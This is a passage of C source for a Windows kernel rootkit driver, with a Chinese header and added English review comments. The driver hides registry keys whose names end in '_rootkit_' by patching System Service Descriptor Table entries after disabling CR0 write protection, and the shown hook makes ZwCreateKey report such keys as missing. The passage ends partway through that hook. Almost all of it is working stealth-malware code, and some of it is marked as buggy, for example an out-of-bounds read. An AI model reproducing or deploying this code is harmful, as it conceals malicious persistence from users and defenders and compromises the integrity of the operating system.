/*///////////////////////////////////
通过HOOK 与注册表访问相关的函数 ZwEnumerateKey ZwEnumerateValueKey
来隐藏注册表的键和键值 设定为_rootkit_ 可以在283行 CheckByName()来修改
ineverland@163.com
/*///////////////////////////////////
#include "ntddk.h"
#include "zwfunc.h"
#include "stdio.h"
#include "stdlib.h"
#include <ctype.h>
/* Saved entry points of the original service handlers. The T_Zw* typedefs
 * come from zwfunc.h (not shown); presumably these are filled in by the
 * hook-installation code outside this view -- confirm against the caller. */
static T_ZwCreateKey Real_ZwCreateKey;
static T_ZwOpenKey Real_ZwOpenKey;
static T_ZwEnumerateKey Real_ZwEnumerateKey;
static T_ZwEnumerateValueKey Real_ZwEnumerateValueKey;
/* Smaller of two values; note both arguments are evaluated twice. */
#define MIN(x,y) ((x) < (y) ? (x) : (y))
/* Size, in bytes, of the path buffers used in this file. */
#define MAXPATHLEN 1024
/* Forward declarations of the SSDT hooking helpers defined below. */
ULONG ServiceIdFromFn (PVOID pfnHandler);
PVOID HookSystemService (ULONG ulService, PVOID pfnNewHandler);
PVOID HookSystemServiceByFn (PVOID pfnHandler, PVOID pfnNewHandler);
#pragma pack(push, 1)
/* Undocumented layout of one system service descriptor (an element of
 * KeServiceDescriptorTable). Packed to 1 byte so the fields line up with
 * the kernel's own layout. Of these fields, only rgpfnHandlerTable and
 * cServices are read by the code visible in this file. */
typedef struct {
    /*
     * Table containing cServices elements of pointers to service handler
     * functions, indexed by service ID.
     */
    PVOID *rgpfnHandlerTable;
    /*
     * Table that counts how many times each service is used. This table
     * is only updated in checked builds.
     */
    PULONG rgulCounterTable;
    /*
     * Number of services contained in this table.
     */
    ULONG cServices;
    /*
     * Table containing the number of bytes of parameters the handler
     * function takes.
     */
    PUCHAR rguchParamTable;
} SSD, *PSSD;
#pragma pack(pop)
/* The service descriptor table (SSDT) exported by the kernel. Indexed by
 * the 2-bit table number that SSTForId() extracts from a service ID. */
__declspec(dllimport) SSD KeServiceDescriptorTable[4];
/*
* Service ID numbers are stored as follows, from LSB to MSB:
* 12 bit service (system call) number
* 2 bit system service table number
* 18 bits (remainder of ULONG) must be zero
*/
/* Table number: bits 12-13 of the service ID. */
#define SSTForId(x) (((ULONG) x) >> 12)
/* Index within that table: the low 12 bits. */
#define IndexForId(x) (((ULONG) x) & 0xFFFUL)
/* A well-formed ID has no bits set above bit 13. */
#define ValidId(x) ((((ULONG) x) & ~0x3FFFUL) == 0UL)
/*
 * Recover the SSDT service ID encoded in an exported Zw* stub.
 *
 * On 32-bit x86 the stub begins with "MOV EAX, imm32" (opcode 0xB8) where
 * imm32 is the service ID, so the ID is read straight from the code bytes
 * at pfnHandler. Returns 0 when the first byte is not 0xB8 or the decoded
 * value has bits set outside the 14-bit table/index layout checked by
 * ValidId(); callers therefore treat 0 as "not found".
 */
ULONG ServiceIdFromFn (PVOID pfnHandler)
{
    PUCHAR pbHandler;
    ULONG ulService;
    pbHandler = (PUCHAR) pfnHandler;
    /* Check for MOV EAX, imm32 instruction */
    if (*pbHandler != 0xB8) {
        DbgPrint("ServiceIdFromFn(): Expected B8 got %02x",
            *pbHandler);
        return 0UL;
    }
    /* Get immediate destination operand of MOV instruction (an unaligned
     * 4-byte read, which x86 tolerates) */
    ulService = *(PULONG) (pbHandler + 1);
    if (!ValidId (ulService)) {
        DbgPrint("ServiceIdFromFn(): Bogus service ID %08x",
            ulService);
        return 0UL;
    }
    return ulService;
}
/*
 * Clear / restore the CR0 write-protect bit (CR0.WP, bit 16, mask 10000H)
 * so that ring-0 writes to read-only pages are not blocked.
 *
 * WPOFF() clears the bit and WPON() sets it again; the pair brackets the
 * SSDT write in HookSystemService(). Both macros clobber EAX.
 */
#define WPOFF() \
    _asm mov eax, cr0 \
    _asm and eax, NOT 10000H \
    _asm mov cr0, eax
/* Inverse of WPOFF(): re-enable write protection. */
#define WPON() \
    _asm mov eax, cr0 \
    _asm or eax, 10000H \
    _asm mov cr0, eax
/*
 * Redirect one SSDT entry to pfnNewHandler (the hook installation step).
 *
 * ulService is a packed service ID (table number in bits 12-13, index in
 * the low 12 bits; see SSTForId/IndexForId). The handler slot for that ID
 * is located in KeServiceDescriptorTable and exchanged while CR0.WP is
 * cleared. Returns the handler previously in the slot, or NULL when the
 * ID is malformed or beyond the table's service count; presumably the
 * caller keeps the return value in the Real_* statics above -- confirm.
 *
 * Defensive note: the exchange below is the single write that leaves an
 * SSDT slot pointing at this driver instead of the kernel's own routine.
 * Integrity checks that compare each slot against the address expected
 * from the kernel image observe exactly that difference.
 */
PVOID HookSystemService (ULONG ulService, PVOID pfnNewHandler)
{
    ULONG ulSST, ulIndex;
    PVOID *pfnHandler, pfnOldHandler;
    PSSD pDescriptor;
    if (!ValidId (ulService)) {
        DbgPrint ("HookSystemService(): Bogus service ID %08x",
            ulService);
        return NULL;
    }
    ulSST = SSTForId (ulService);
    ulIndex = IndexForId (ulService);
    /*
     * Look up the service descriptor table entry and check that it
     * contains the service index that is to be hooked.
     */
    pDescriptor = &KeServiceDescriptorTable[ulSST];
    /* The address of an array element is never NULL, so this guard cannot fire. */
    if (pDescriptor == NULL) {
        DbgPrint ("HookSystemService(): No descriptor for SST %x",
            ulSST);
        return NULL;
    }
    /* NOTE(review): ulIndex == cServices passes this test although it
     * addresses the slot one past the end of the table. */
    if (pDescriptor->cServices < ulIndex) {
        DbgPrint ("HookSystemService(): Index %03x exceeds service "
            "count of %03x for SST %x", ulIndex,
            pDescriptor->cServices, ulSST);
        return NULL;
    }
    pfnHandler = &pDescriptor->rgpfnHandlerTable[ulIndex];
    pfnOldHandler = *pfnHandler;
    /* 80000000-FFFFFFFF is the region of memory reserved for the OS */
    if (((ULONG)pfnOldHandler & 0x80000000UL) == 0) {
        DbgPrint ("HookSystemService(): Old handler %08x for SST %x "
            "index %03x is not in kernel region",
            (ULONG) pfnOldHandler, ulSST, ulIndex);
        /* return NULL */
        /* Diagnostic only: the hook is installed regardless. */
    }
    DbgPrint ("HookSystemService(): Hooking SST %x Index %03x Old %08x",
        ulSST, ulIndex, (ULONG) pfnOldHandler);
    /* The SSDT normally sits on a read-only page, hence WPOFF()/WPON()
     * around the write; the exchange itself is atomic. */
    __try {
        WPOFF();
        pfnOldHandler = InterlockedExchangePointer (pfnHandler, pfnNewHandler);
        WPON();
    } __except (EXCEPTION_EXECUTE_HANDLER) {
        /* On a write fault the return value becomes the slot's address,
         * not a handler pointer. */
        pfnOldHandler = pfnHandler;
        DbgPrint("HookSystemService(): Hook failed - can't write");
    }
    return pfnOldHandler;
}
/*
 * Hook the service whose exported Zw* stub is pfnHandler.
 *
 * The service ID is decoded from the stub's "MOV EAX, imm32" prologue by
 * ServiceIdFromFn() and handed to HookSystemService(). Returns the
 * previous handler, or NULL if the ID could not be decoded (0 returned)
 * or HookSystemService() rejected it.
 */
PVOID HookSystemServiceByFn (PVOID pfnHandler, PVOID pfnNewHandler)
{
    ULONG ulService;
    ulService = ServiceIdFromFn (pfnHandler);
    if (ulService == 0UL)
        return NULL;
    return HookSystemService (ulService, pfnNewHandler);
}
//////////////////////////////////////////////////////////////////
/*
 * Local prototype for the kernel's object-name query. Name actually
 * receives an OBJECT_NAME_INFORMATION (a UNICODE_STRING header followed
 * by the name's storage), which is why PathFromHandle() sizes that buffer
 * as MAXPATHLEN * 2 + 2 * sizeof(ULONG).
 */
NTKERNELAPI NTSTATUS ObQueryNameString (
    IN PVOID Object,
    IN OUT PUNICODE_STRING Name,
    /* ^ this should strictly be POBJECT_NAME_INFORMATION */
    IN ULONG MaximumLength,
    OUT PULONG ActualLength
    );
/*
 * Build the ANSI full path of a registry key from a handle into fullname.
 *
 * hKey is the (possibly NULL) parent key handle and lpszSubKeyVal an
 * optional name relative to it. The object name of hKey is queried,
 * given a leading '\' if the kernel returned it without one, and then
 * "\" + lpszSubKeyVal is appended. The result is copied into fullname,
 * which the caller must size to at least MAXPATHLEN bytes
 * (Hook_ZwCreateKey allocates exactly that). Returns FALSE only when a
 * temporary pool allocation fails; a handle that cannot be resolved is
 * not an error -- fullname then holds "\" + subkey, or "" when neither
 * part could be resolved.
 */
BOOLEAN PathFromHandle (HANDLE hKey, PUNICODE_STRING lpszSubKeyVal,
    PCHAR fullname)
{
    PVOID pKey = NULL;
    ANSI_STRING keyname;
    PCHAR tmpname;
    PUNICODE_STRING fullUniName;
    ULONG actualLen;
    /* Allocate a temporary buffer */
    tmpname = ExAllocatePool (PagedPool, MAXPATHLEN);
    if (tmpname == NULL)
        /* Not enough memory */
        return FALSE;
    /* Both buffers start empty, so fullname is defined even if nothing resolves. */
    *fullname = *tmpname = '\0';
    if (NT_SUCCESS (ObReferenceObjectByHandle (hKey, 0, NULL, KernelMode,
        &pKey, NULL)) && pKey != NULL) {
        /* Space for an OBJECT_NAME_INFORMATION header plus MAXPATHLEN UTF-16 characters. */
        fullUniName = ExAllocatePool (PagedPool, MAXPATHLEN * 2 +
            2 * sizeof(ULONG));
        if (fullUniName == NULL) {
            ObDereferenceObject (pKey);
            ExFreePool (tmpname);
            return FALSE;
        }
        /* NOTE(review): MaximumLength here (MAXPATHLEN*2 bytes) and the length
         * passed to ObQueryNameString (MAXPATHLEN) disagree -- confirm which
         * one the kernel honours before relying on either bound. */
        fullUniName->MaximumLength = MAXPATHLEN*2;
        if (NT_SUCCESS (ObQueryNameString (pKey, fullUniName,
            MAXPATHLEN, &actualLen ))) {
            /* Convert to ANSI; TRUE asks Rtl to allocate keyname.Buffer. */
            if (NT_SUCCESS (RtlUnicodeStringToAnsiString (
                &keyname, fullUniName, TRUE))) {
                if(*keyname.Buffer != '\0') {
                    /* Make sure the path starts with a backslash. */
                    if (*keyname.Buffer != '\\')
                        strcpy (tmpname, "\\");
                    else
                        strcpy (tmpname, "");
                    /* Length is the byte count of the ANSI copy; the bound
                     * leaves room for the leading '\' and the terminator. */
                    strncat (tmpname, keyname.Buffer,
                        MIN( keyname.Length,
                        MAXPATHLEN - 2 ));
                }
                RtlFreeAnsiString (&keyname);
            }
        }
        ObDereferenceObject (pKey);
        ExFreePool (fullUniName);
    }
    if (lpszSubKeyVal != NULL) {
        /* Pre-cleared so nothing dangling is seen if the conversion fails. */
        keyname.Buffer = NULL;
        if (NT_SUCCESS (RtlUnicodeStringToAnsiString (&keyname,
            lpszSubKeyVal, TRUE))) {
            if (*keyname.Buffer != '\0') {
                /* Separator, then as much of the subkey as fits alongside
                 * what tmpname already holds plus the terminator. */
                strcat (tmpname, "\\");
                strncat (tmpname, keyname.Buffer,
                    MIN(keyname.Length, MAXPATHLEN - 1 -
                    strlen(tmpname)));
            }
            RtlFreeAnsiString (&keyname);
        }
    }
    /* fullname must be able to hold MAXPATHLEN bytes. */
    strcpy (fullname, tmpname);
    ExFreePool (tmpname);
    return TRUE;
}
/* Defined outside this view; called from OnUnload(), presumably to put the
 * original SSDT entries back -- confirm against the definition. */
void RemoveRegistryHooks (void);
/*
 * Driver unload routine: removes the registry hooks before the image goes
 * away, then logs. DriverObject is not used.
 */
VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
{
    RemoveRegistryHooks();
    DbgPrint("OnUnload Routine called\n");
}
/*
 * Return 1 if szKeyName ends in the 9-byte marker "_rootkit_", else 0.
 * The hooks call this on the resolved key path to decide which keys to
 * suppress (see Hook_ZwCreateKey).
 *
 * NOTE(review): for a name shorter than 9 bytes, strlen() - 9 wraps and
 * temp points before the start of the buffer -- an out-of-bounds read.
 */
int CheckKeyByName(PCHAR szKeyName)
{
    /* Start of the trailing 9 bytes. */
    PCHAR temp=szKeyName+(strlen(szKeyName)-9);
    if(!strncmp(temp,"_rootkit_",9))
        return 1;
    else
        return 0;
}
/* Defined outside this view; applied to the resolved path before
 * CheckKeyByName() in Hook_ZwCreateKey(). */
VOID AdjustKeyName (PCHAR szKeyName);
/* Redeclarations of the hooking helpers already declared near the top. */
ULONG ServiceIdFromFn (PVOID pfnHandler);
PVOID HookSystemService (ULONG ulService, PVOID pfnNewHandler);
PVOID HookSystemServiceByFn (PVOID pfnHandler, PVOID pfnNewHandler);
/*
* Hook of ZwCreateKey();
*/
NTSTATUS Hook_ZwCreateKey (
OUT PHANDLE KeyHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG TitleIndex,
IN PUNICODE_STRING Class OPTIONAL,
IN ULONG CreateOptions,
OUT PULONG Disposition OPTIONAL
)
{
NTSTATUS rc;
PCHAR szFullName;
/* Find the full name of the key and check access on it */
szFullName = ExAllocatePool (PagedPool, MAXPATHLEN);
if (szFullName != NULL) {
if (PathFromHandle (ObjectAttributes->RootDirectory,
ObjectAttributes->ObjectName, szFullName)) {
AdjustKeyName (szFullName);
if (CheckKeyByName (szFullName)) {
ExFreePool (szFullName);
return STATUS_NO_SUCH_FILE;
}
}
ExFreePool (szFullName);
}